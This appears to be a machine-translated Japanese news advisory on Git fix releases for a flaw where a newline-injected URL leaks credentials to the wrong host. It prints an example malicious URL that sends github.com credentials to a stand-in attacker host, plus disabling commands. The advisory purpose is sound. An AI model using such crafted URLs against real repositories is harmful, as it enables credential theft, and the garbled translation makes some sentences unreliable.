分散ソース管理システム Git 2.26.1、2.25.3、2.24.2、2.23.2、2.22.3、2.21.2、2.20.3、2.19.4、2.18.3、2.17.4 の修正リリース排除したもの () ハンドラー内で "これにより、git クライアントが改行文字を含む特別にフォーマットされた URL を使用してリポジトリにアクセスすると、資格情報が間違ったホストに送信されます。 この脆弱性を利用して、別のホストからの認証情報が攻撃者が制御するサーバーに送信されるようにすることができます。
「https://evil.com?%0ahost=github.com/」のような URL を指定すると、ホスト evil.com に接続する際の資格情報ハンドラーは、github.com に指定された認証パラメーターを渡します。 この問題は、サブモジュールの URL の処理を含む「git clone」などの操作を実行するときに発生します (たとえば、「git submodule update」は、リポジトリの .gitmodules ファイルで指定された URL を自動的に処理します)。 この脆弱性は、開発者が URL を確認せずにリポジトリのクローンを作成する状況 (サブモジュールを操作する場合など) や、自動アクションを実行するシステム (パッケージ ビルド スクリプトなど) で最も危険です。
新しいバージョンの脆弱性をブロックするには 資格情報交換プロトコルを通じて送信される値には改行文字を渡します。 ディストリビューションの場合、ページでパッケージ更新のリリースを追跡できます。 , , , , , , .
問題をブロックするための回避策として パブリック リポジトリにアクセスする場合は credential.helper を使用しないでください。また、チェックされていないリポジトリでは「--recurse-submodules」モードで「git clone」を使用しないでください。 credential.helper ハンドラーを完全に無効にするには、次のようにします。 そしてパスワードを取得する 、保護されています またはパスワード付きのファイルの場合は、次のコマンドを使用できます。
git config --unset credential.helper
git config --global --unset credential.helper
git config --system --unset credential.helper
出所: オープンネット.ru